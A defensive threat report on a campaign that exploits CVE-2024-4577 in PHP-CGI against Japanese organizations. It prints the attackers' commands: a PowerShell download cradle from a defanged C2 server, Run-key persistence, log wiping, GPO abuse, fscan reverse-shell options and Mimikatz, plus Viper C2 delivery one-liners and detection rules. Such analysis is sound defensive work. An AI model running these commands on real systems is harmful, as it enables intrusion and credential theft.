This article examines a new wave of sustained, targeted cyberattacks against organizations in Japan. It explains how attackers gain initial access, what tools they use to infiltrate networks, and why this case has caught the attention of cybersecurity analysts. It provides a detailed breakdown of the techniques involved, advanced reconnaissance and penetration methods, and an analysis of how the attacks remain hidden for long periods of time. It also explains why public hacking frameworks are dangerous, how they help attackers scale their attacks, and why traditional defenses may fail.
In early 2025, a sustained and well-planned wave of cyberattacks was recorded, targeting organizations primarily in Japan. The incidents spanned a variety of industries, including technology, telecommunications, education, and e-commerce, suggesting a broad range of interests and potential political and economic motivations.
The initial penetration was achieved through CVE-2024-4577, a critical vulnerability that allows remote code execution in PHP-CGI on Windows. This vulnerability, present in a number of server configurations, opened the way to a full compromise of systems, after which the attackers gained control at the operating system level.
Once inside, the attackers used plugins from the public Cobalt Strike “TaoWu” kit to escalate privileges to SYSTEM, persist on the host, hide their activity, and collect credentials. A pre-configured installation script was found on the command-and-control (C2) servers; it automatically deploys a set of tools and frameworks pulled from a cloud container registry. This points to a systematic approach and to infrastructure built to scale the campaign.
This scenario highlights a current trend of actively exploiting vulnerabilities in widely available software, public post-exploitation tools, and automated means to rapidly deploy malicious platforms. The actions captured indicate that the attackers’ goal may have gone far beyond stealing credentials, likely envisioning a long-term presence on networks and potential future operations.
The attacker was found to be primarily targeting organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artifacts.
The attacker attempts to compromise the victim’s machine using an exploit for CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation on Windows. If exploitation succeeds, the attacker executes a PowerShell script that launches Cobalt Strike reverse HTTP shellcode, providing remote access to the victim’s machine.
They then begin reconnaissance, gathering information about the system and user privileges. They run privilege escalation exploits such as JuicyPotato, RottenPotato, and SweetPotato to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using a Cobalt Strike suite plugin called “TaoWu”.
To maintain stealth, they wipe event logs using wevtutil commands, removing traces of their actions from the Windows Security, System, and Application logs. They also conduct network reconnaissance using “fscan.exe” and “Seatbelt.exe” to identify potential targets for lateral movement. The attacker also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Finally, they execute Mimikatz commands to create a dump and extract passwords and NTLM hashes from memory on the victim’s computer.
It was discovered that the attacker gains initial access to the victim’s network by exploiting CVE-2024-4577.
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations that run PHP in CGI mode. It stems from the “Best-Fit” behavior of certain Windows code pages (the Japanese code page 932 among them), in which characters without an exact equivalent are replaced by their closest match: the soft-hyphen byte 0xAD is mapped to an ordinary hyphen. PHP-CGI therefore treats a URL-encoded %AD in the query string as “-” and interprets what follows as a php-cgi command-line option, so an attacker can inject INI directives such as allow_url_include=1 and auto_prepend_file=php://input and execute arbitrary PHP code supplied in the request body on any server running Apache with a vulnerable PHP-CGI configuration.
To exploit the vulnerability, the attacker uses a publicly available Python exploit script, “PHP-CGI_CVE-2024-4577_RCE.py”. The script first checks whether a given URL is vulnerable by sending a specially crafted POST request with PHP code that triggers the flaw; if the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e” (the MD5 of the string “123456”), exploitation succeeded. The script then prompts the operator for PHP code, executes it on the vulnerable server, and displays the response.
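As an added example (not code from the original report or from the exploit script above), the following Python detector applies the mechanism just described to web-server access logs: it URL-decodes each request’s query string to bytes, looks for the soft-hyphen byte 0xAD immediately followed by an option letter, recovers the php-cgi directives that would be injected, and records whether the query contained no literal “=”, the condition under which a CGI server passes the query string to php-cgi as command-line arguments. The log lines are constructed for the example and the client addresses are documentation ranges.

```python
from __future__ import annotations
import re
import urllib.parse
from dataclasses import dataclass

# Constructed access-log lines (not taken from the page or any real server);
# 203.0.113.0/24 and 198.51.100.0/24 are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2025:09:12:01 +0900] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2025:09:12:07 +0900] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 44 "-" "python-requests/2.31"
203.0.113.9 - - [10/Mar/2025:09:12:08 +0900] "POST /test.php?%add+cgi.force_redirect%3d0+%add+cgi.redirect_status_env+%add+auto_prepend_file%3dphp://input HTTP/1.1" 200 44 "-" "python-requests/2.31"
198.51.100.7 - - [10/Mar/2025:09:13:44 +0900] "GET /page.php?id=%E2%80%93d HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Common Log Format: client, timestamp, then the request line and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Byte 0xAD (soft hyphen) followed by an option letter and an optional argument.
# On affected code pages php-cgi Best-Fit-maps 0xAD to '-', so the decoded
# sequence "\xadd allow_url_include=1" is parsed as "-d allow_url_include=1".
OPTION_RE = re.compile(rb'\xad([A-Za-z])(?:\s*([^\s\xad]+))?')


@dataclass
class Finding:
    ip: str
    path: str
    options: list        # (option letter, argument) pairs that would be injected
    argv_style: bool     # query had no literal '=' so CGI hands it to php-cgi as argv


def decode_query(target: str) -> tuple[str, bytes]:
    """Split the request target; return (raw query, percent-decoded query bytes)."""
    if '?' not in target:
        return '', b''
    raw = target.split('?', 1)[1]
    # '+' is a space in query strings; decode to bytes so the 0xAD byte survives
    # instead of being turned into U+00AD by a text decoder.
    return raw, urllib.parse.unquote_to_bytes(raw.replace('+', ' '))


def injected_options(query: bytes) -> list[tuple[str, str]]:
    return [(m.group(1).decode('ascii'), (m.group(2) or b'').decode('latin-1'))
            for m in OPTION_RE.finditer(query)]


def scan_log(text: str) -> list[Finding]:
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw, decoded = decode_query(m['target'])
        opts = injected_options(decoded)
        if opts:
            path = m['target'].split('?', 1)[0]
            findings.append(Finding(m['ip'], path, opts, '=' not in raw))
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f.ip, f.path, f.options, 'argv-style query' if f.argv_style else '')
```

The fourth sample line carries an en dash (%E2%80%93) rather than a soft hyphen and is correctly ignored; matching on the decoded 0xAD byte, not on the literal text “%AD”, is what keeps the check immune to upper/lower-case encoding variants.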

During this intrusion, it was discovered that the attacker executed an embedded PowerShell command in the PHP code to trigger the infection.
<?php system ('powershell -c "IEX (New-Object System.Net.WebClient).DownloadString(\'http[://]38[.]14[.]255[.]23:8000/payload[.]ps1\')"');?>
The attacker initiates the infection by executing a PowerShell command via PHP code, which results in the PowerShell injector script being downloaded and executed from the C2 server in the victim machine’s memory.
The PowerShell injector script contains an embedded Cobalt Strike reverse HTTP shellcode data blob in base64 or hexadecimal encoding. Once executed, it injects and executes the Cobalt Strike reverse HTTP shellcode in the victim machine’s memory and connects to the Cobalt Strike server running on the C2 server via HTTP, providing remote access to the victim machine.

The shellcode connects to the C2 server 38[.]14[.]255[.]23 over HTTP on port 8077, using the URL paths “/6Qeq” or “/jANd”. The beacon traffic carried one of two User-Agent headers:
User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)

After gaining remote access to the victim’s machine via Cobalt Strike’s reverse HTTP shellcode, the attacker remotely executes commands on the victim’s machine from a Cobalt Strike server configured with plugins from the Cobalt Strike “TaoWu” suite (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform post-exploitation tasks.
Below are the post-exploitation commands observed during this attack, mapped to MITRE ATT&CK techniques.
The attacker collects the victim’s system and user information, as well as checks time synchronization by remotely executing the following commands on the victim’s machine.
whoami /all
dir
net time
The attacker attempts to elevate privileges by running the JuicyPotato, RottenPotato, and SweetPotato exploits. The Potato family abuses the way Windows handles authentication and impersonation tokens to move from a low-privileged account to SYSTEM.
Microsoft has patched the specific weaknesses these exploits rely on in Windows 10 and in Windows Server 2012, 2016, 2019, and later versions. However, any process that holds the “SeImpersonatePrivilege” right, which allows it to impersonate another user’s security token, remains a candidate for abuse by JuicyPotato, SweetPotato, and RottenPotato; service accounts such as those used by IIS and SQL Server commonly hold that right, which is why web-server compromises so often lead straight to SYSTEM.
The attacker uses Ladon[.]exe, a tool bundled as a Cobalt Strike “TaoWu” plugin, to bypass User Account Control (UAC) on the victim’s computer.
Ladon.exe BypassUac C:\Windows\Temp\123.exe
The attacker uses the “reg add” command and other .NET plugins from the TaoWu Cobalt Strike suite to modify registry keys and create scheduled Windows tasks to ensure their persistence on the victim’s computer.
The attacker executes the “reg add” command to create a Run-key value named “Svchost” that launches the beacon executable through cmd.exe.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Windows\system32\cmd.exe /c C:\Windows\Temp\payload.exe" /f
The attacker runs “sharpTask.exe”, a .NET program used to schedule a task on a Windows computer.
sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30 \ some Service "Some Service" C:\Windows\Temp\payload.exe
They run “SharpHide.exe”, a utility used to create a hidden registry key.
SharpHide.exe action=create keyvalue="C:\Windows\Temp\123.exe"
They also run “SharpStay.exe” – a .NET tool used to create a service on a Windows computer.
SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\tmp\payload.exe"
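The four persistence steps above (Run key, scheduled task, hidden registry value, service) each leave an artifact a responder can audit from host exports. The Python script below is an added example, not part of the original report or of the TaoWu kit: it parses constructed `reg query` output for the Run key, a column subset of `schtasks /query /fo csv /v`, and a `Name,PathName` CSV of Win32_Service, and flags autostart entries that run from a temp directory, that borrow a system-process name such as “Svchost” without launching the real binary, or that wrap a cmd.exe or download cradle. SharpHide’s value is written under a null-prefixed name that standard registry tools do not display correctly, so an entry under Run whose name is blank or garbled deserves scrutiny even though this parser cannot see it.

```python
from __future__ import annotations
import csv
import io
import re
from dataclasses import dataclass, field

# Constructed host exports (not from the page): the Run key as printed by
# `reg query HKLM\...\Run`, a column subset of `schtasks /query /fo csv /v`,
# and Name,PathName of Win32_Service exported to CSV.
RUN_KEY_EXPORT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Svchost    REG_SZ    C:\Windows\system32\cmd.exe /c C:\Windows\Temp\payload.exe
"""
TASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User"
"SRV01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"SRV01","\Some Service","C:\Windows\Temp\payload.exe","SYSTEM"
'''
SERVICES_CSV = r'''Name,PathName
Spooler,C:\Windows\System32\spoolsv.exe
Debug,C:\Windows\tmp\payload.exe
'''

# Directories an autostart entry has no business running from.
SUSPICIOUS_DIRS = re.compile(r'\\windows\\te?mp\\|\\appdata\\local\\temp\\|\\users\\public\\', re.I)
# Names attackers borrow from core Windows processes.
MASQUERADE = {'svchost', 'lsass', 'csrss', 'winlogon', 'services', 'explorer'}
# Shell wrappers and download cradles inside an autostart command.
CRADLE = re.compile(r'downloadstring|invoke-expression|\biex\b|-enc(odedcommand)?\b|cmd(\.exe)? /c ', re.I)
# One `reg query` value line: name, REG_* type, data, separated by runs of spaces.
RUN_LINE = re.compile(r'^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$')


@dataclass
class Finding:
    source: str
    name: str
    command: str
    reasons: list[str] = field(default_factory=list)


def assess(source: str, name: str, command: str) -> Finding | None:
    reasons = []
    if SUSPICIOUS_DIRS.search(command):
        reasons.append('executable under a temp/user-writable directory')
    base = name.strip().lower().split('.')[0]
    if base in MASQUERADE and '\\system32\\' + base not in command.lower():
        reasons.append(f'name mimics system process {base} but does not launch it')
    if CRADLE.search(command):
        reasons.append('command wraps a shell/download cradle')
    return Finding(source, name, command, reasons) if reasons else None


def parse_run_key(text: str):
    for line in text.splitlines():
        m = RUN_LINE.match(line)
        if m:
            yield m['name'], m['data']


def parse_csv(text: str, name_col: str, cmd_col: str):
    for row in csv.DictReader(io.StringIO(text)):
        yield row[name_col], row[cmd_col]


def audit(run_export: str = RUN_KEY_EXPORT, tasks_csv: str = TASKS_CSV,
          services_csv: str = SERVICES_CSV) -> list[Finding]:
    findings = []
    for source, entries in (
        ('run_key', parse_run_key(run_export)),
        ('scheduled_task', parse_csv(tasks_csv, 'TaskName', 'Task To Run')),
        ('service', parse_csv(services_csv, 'Name', 'PathName')),
    ):
        for name, command in entries:
            f = assess(source, name, command)
            if f:
                findings.append(f)
    return findings


if __name__ == '__main__':
    for f in audit():
        print(f'{f.source}: {f.name!r} -> {f.command}\n    ' + '; '.join(f.reasons))
```

On a live host the three inputs come from `reg query`, `schtasks /query /fo csv /v`, and `Get-CimInstance Win32_Service | Select-Object Name,PathName | Export-Csv`; the legitimate Defender and defragmentation entries in the sample pass without a finding, while the three TaoWu-style entries are each flagged.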
The attacker removes evidence of their activity by clearing the Windows event logs on the compromised endpoint with the “wevtutil.exe” binary (a LOLBin). Clearing a log is itself logged (Security Event ID 1102, System Event ID 104), which is a reliable detection point.
wevtutil cl security
wevtutil cl system
wevtutil cl application
wevtutil cl "windows powershell"
The attacker uses fscan.exe, an open-source network scanner, and Seatbelt, a tool that collects detailed host information such as remote-access configuration, network shares, and other security-relevant data, to perform network reconnaissance ahead of lateral movement within the victim’s network.
The attacker downloads the “fscan.exe” utility from the C2 server to the “C:\Windows\Temp” directory on the victim’s machine.
upload /"C2 server path"/fscan.exe
The attacker runs the .NET program “Seatbelt.exe” to collect information related to remote access to the victim’s computer.
Seatbelt.exe -group=Remote -full
The attacker runs “SharpGPOAbuse.exe,” a tool used to abuse Group Policy Objects (GPOs) for malicious purposes. The attacker creates a scheduled task via the GPO called “update” that executes a PowerShell command over the network that downloads and executes the attacker’s PowerShell payload.
SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http[://]38[.]14[.]255[.]23:8000/payload.ps1'))\"" --GPOName "Default Server Policy"
The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services on the subnet.
fscan.exe -h 192[.]168[.]1[.]1/24
The attacker also uses fscan’s Redis and SSH modules. The “-rf id_rsa.pub” option makes fscan write the supplied SSH public key into authorized_keys through any unauthenticated Redis instance it finds, giving the attacker key-based SSH access to those hosts, and “-m ssh -p 2222” brute-forces SSH credentials on hosts running the service on the non-default port 2222.
fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub
fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222
Using the same Redis abuse, the “-rs” option writes a cron entry that opens a reverse shell to 192.168.1.1 on port 6666, and “-c whoami” runs the whoami command over SSH on every host whose credentials fscan has obtained.
fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666
fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami
The attacker executes Mimikatz commands to collect plaintext passwords and NTLM hashes from memory on the victim’s computer.
sekurlsa::logonpasswords
In this intrusion the exploit was used to gain initial access and launch Cobalt Strike reverse HTTP beacons, which gave the attackers persistent remote control over compromised machines. Post-exploitation relied on the Cobalt Strike “TaoWu” kit and its plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, fscan, and the Mimikatz credential-harvesting tool.
According to The DFIR Report, similar tradecraft has previously been seen in operations associated with a group known as “Dark Cloud Shield” or “You Dun”, but attribution in this case has not been confirmed: after the credentials were extracted, no further activity characteristic of that group was observed.
The attacker was found to be using two C2 servers, 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77, hosted in Alibaba Cloud, on which the Cobalt Strike team server ran. On 38[.]14[.]255[.]23, open directories and a root folder were accessible that held PowerShell scripts, Cobalt Strike beacon executables, exploits, and logs of executed commands.
Content analysis showed that the attacker downloaded and executed a pre-configured LinuxEnvConfig.sh installation shell script from the “yijingsec” repository on Gitee. The script is designed to set up Ubuntu/Debian/Kali environments and deploy publicly available offensive security tools (Vulfocus, ARL, Viper C2, Starkiller, BeEF, Blue-Lotus) as Docker containers pulled from registry[.]cn-shanghai[.]aliyuncs[.]com. In addition, running the script changes the host’s DNS settings to point at 114[.]114[.]114[.]114 (the 114DNS public resolver, widely used in China), which is unusual for most other regions.

We also see a consistent trend of publicly available tools (Cobalt Strike, Metasploit, ARL, Vulfocus, PowerShell Empire) being used in malicious campaigns. The LinuxEnvConfig script additionally deploys frameworks that are less common in criminal toolkits, Blue-Lotus, BeEF, and Viper C2; their capabilities are documented below to show how these tools can be used in the attack and exploitation phases.
Blue-Lotus is a cross-site scripting (XSS) attack framework built around a JavaScript web shell. It ships as a Docker image and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity research and competition team at Tsinghua University.
The Blue-Lotus admin panel is in Chinese and contains a control panel for hosting XSS attacks; it displays connection details of the victim’s browser, including the IP address and the browser in use.

Blue-Lotus has a payload generation panel where the user can generate a JavaScript web shell payload using a default JavaScript template from the tool’s database. An attacker using the framework can generate a web shell and use it in their attacks to perform the following tasks:
Cross-site scripting (XSS).
Take a screenshot of a remote machine.
Get reverse access to a remote machine via a shell.
Steal browser cookies.
Create user accounts and passwords in a content management system (CMS).

BeEF is a publicly available browser exploit framework that allows an attacker to connect to one or more web browsers on a victim’s computer and execute commands in the context of the browser. BeEF has command modules consisting of JavaScript code to perform the following tasks:
Check if links, forms, and web page URIs in the connected browser are vulnerable to XSS.
Send arbitrary requests on behalf of the connected browser.
Interact with a host on the connected browser’s local network.
Send commands to victim systems via a Web Real-Time Communication (WebRTC) call.

Viper C2 is a modular framework whose advanced functionality comes from plugins and scripts. It has built-in integration with the Metasploit Framework (MSF) and its Meterpreter console and scripts.
Viper C2 has the following functionalities:
Bypass antivirus software.
Intranet tunnel.
File management on a remote machine, such as downloading and executing other executables.
Remotely execute a command on a compromised host.
Generate Meterpreter reverse-shell payloads in multiple formats for Windows, Linux, and macOS.
Display the topology of a compromised network.

Viper C2 can generate HTTP and TCP Meterpreter reverse-shell payloads for various platforms, including Windows, Linux, macOS, Android, Java, and Python. Payloads can be produced in formats such as EXE, DLL, ELF, ELF-SO, MSBuild, Mach-O, PowerShell script, PowerShell command, Python script, HTA, and VBA.

The generated payloads are delivered to victims using Viper C2 web delivery commands that the user can generate, including the delivery URL and tool in their attacks.

Below are examples of commands generated by Viper C2 that help defenders and threat hunters detect activities related to this framework:
Windows:
regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll
Linux:
wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown
PHP:
php -d allow_url_fopen=true -r "eval(file_get_contents('hxxp[://]C2 server:port/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
Python:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('hxxp[://]C2 server:port/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());"
PowerShell:
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
$pbFU=new-object net.webclient;
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy();
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};
IEX ((new-object Net.WebClient).DownloadString('C2 server:port/WyeslpUl/KaptrNuHdqhM'));
IEX ((new-object Net.WebClient).DownloadString('C2 server:port'));
Linux download and execute:
wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port/api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 1737698200.elf && ./1737698200.elf
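Both the TaoWu post-exploitation commands listed earlier (log clearing, Run-key persistence, GPO abuse, fscan scanning, UAC bypass) and the Viper C2 web-delivery one-liners above leave distinctive process command lines. The Python hunter below is an added example, not taken from the original report or from either tool: it runs a set of regular-expression rules, each tagged with the MITRE ATT&CK technique it covers, over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style; the host names and the C2 address 203.0.113.10 are placeholders), reports the hits, and pulls the staging URLs out of the flagged events so they can be blocked. Mimikatz run in-memory through a Cobalt Strike beacon produces no process command line, so LSASS access has to be hunted with Sysmon Event ID 10 instead; that is deliberately outside this example.

```python
from __future__ import annotations
import re

# Constructed process-creation events (Sysmon EID 1 / Security 4688 style).
# Host names are placeholders and 203.0.113.10 stands in for the C2 server.
EVENTS = [
    {"host": "WEB01", "cmdline": "wevtutil cl security"},
    {"host": "WEB01", "cmdline": r'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Windows\system32\cmd.exe /c C:\Windows\Temp\payload.exe" /f'},
    {"host": "WEB01", "cmdline": 'SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --GPOName "Default Server Policy"'},
    {"host": "WEB01", "cmdline": "fscan.exe -h 192.168.1.1/24 -m ssh -p 2222"},
    {"host": "WEB01", "cmdline": r"Ladon.exe BypassUac C:\Windows\Temp\123.exe"},
    {"host": "WS07", "cmdline": "regsvr32 /s /n /u /i:http://203.0.113.10:8080/SWLonxen.sct scrobj.dll"},
    {"host": "lnx-app3", "cmdline": "wget -qO lYoSQUgn --no-check-certificate http://203.0.113.10:8080/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown"},
    {"host": "lnx-app3", "cmdline": "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://203.0.113.10:8080/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false]])));\""},
    {"host": "lnx-app3", "cmdline": "python -c \"import sys;import ssl;u=__import__('urllib.request',fromlist=('urlopen',));r=u.urlopen('http://203.0.113.10:8080/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());\""},
    {"host": "WS07", "cmdline": "powershell -nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('http://203.0.113.10:8080/WyeslpUl/KaptrNuHdqhM'))"},
    # Benign look-alikes that must not match.
    {"host": "WS07", "cmdline": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"host": "lnx-app3", "cmdline": "wget -q https://deb.debian.org/debian/dists/bookworm/Release"},
    {"host": "WS07", "cmdline": r'regsvr32 /s "C:\Program Files\Common Files\System\ado\msado15.dll"'},
]

# (ATT&CK technique, description, pattern); matched case-insensitively.
RULES = [(tid, name, re.compile(pat, re.I | re.S)) for tid, name, pat in [
    ("T1070.001", "Clear Windows event logs", r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b"),
    ("T1547.001", "Registry Run key persistence", r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b"),
    ("T1053.005", "Scheduled task persistence", r"\bschtasks(\.exe)?\s+/create\b|\bsharptask(\.exe)?\s+--addtask\b"),
    ("T1543.003", "Windows service persistence", r"\bsc(\.exe)?\s+create\b|\bsharpstay(\.exe)?\s+action=createservice\b"),
    ("T1484.001", "Group Policy modification", r"\bsharpgpoabuse(\.exe)?\b"),
    ("T1548.002", "UAC bypass", r"\bladon(\.exe)?\s+bypassuac\b"),
    ("T1134.001", "Token impersonation (Potato family)", r"\b(juicy|rotten|sweet)potato"),
    ("T1046", "Network service discovery", r"\bfscan(\.exe)?\s+.*-h\s+\d"),
    ("T1218.010", "Regsvr32 scriptlet execution", r"\bregsvr32(\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b"),
    ("T1059.001", "PowerShell download cradle", r"(downloadstring|downloadfile|invoke-webrequest)\s*\(?.*https?://|https?://.*\b(iex|invoke-expression)\b"),
    ("T1105", "Download-then-execute on Linux", r"\b(wget|curl)\b.*https?://.*(;|&&)\s*chmod\s+(\+x|[0-7]{3})\b"),
    ("T1059.006", "Python download cradle", r"\bpython[23]?\s+-c\b.*urlopen\(.*exec\("),
    ("T1059", "PHP remote eval", r"\bphp\s+.*-r\b.*eval\(\s*file_get_contents\("),
]]

URL_RE = re.compile(r"""https?://[^\s'";)]+""")


def hunt(events: list[dict]) -> list[dict]:
    """Return one hit per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        for tid, name, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append({"technique": tid, "name": name, "host": ev["host"], "cmdline": ev["cmdline"]})
    return hits


def staging_urls(hits: list[dict]) -> list[str]:
    """Unique download URLs from flagged command lines only (block-list candidates)."""
    return sorted({u for h in hits for u in URL_RE.findall(h["cmdline"])})


if __name__ == "__main__":
    found = hunt(EVENTS)
    for h in found:
        print(f'{h["technique"]:10} {h["host"]:9} {h["name"]}: {h["cmdline"][:70]}')
    print("staging URLs:", *staging_urls(found), sep="\n  ")
```

The three benign events (a `reg query`, a package-index download without a chmod, and a local `regsvr32` registration) produce no hits, and only URLs from flagged events reach the block list, so the Debian mirror is never proposed as an indicator.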
A targeted and technically sophisticated campaign has been identified that, via CVE-2024-4577, infiltrates Windows servers with PHP-CGI and deploys Cobalt Strike and related tools for privilege escalation, persistence, and credential theft. This is not an isolated operation – PHP-CGI installations should be inspected, looking for persistence traces and suspicious outbound connections, as the threat of a long-term presence on networks is real.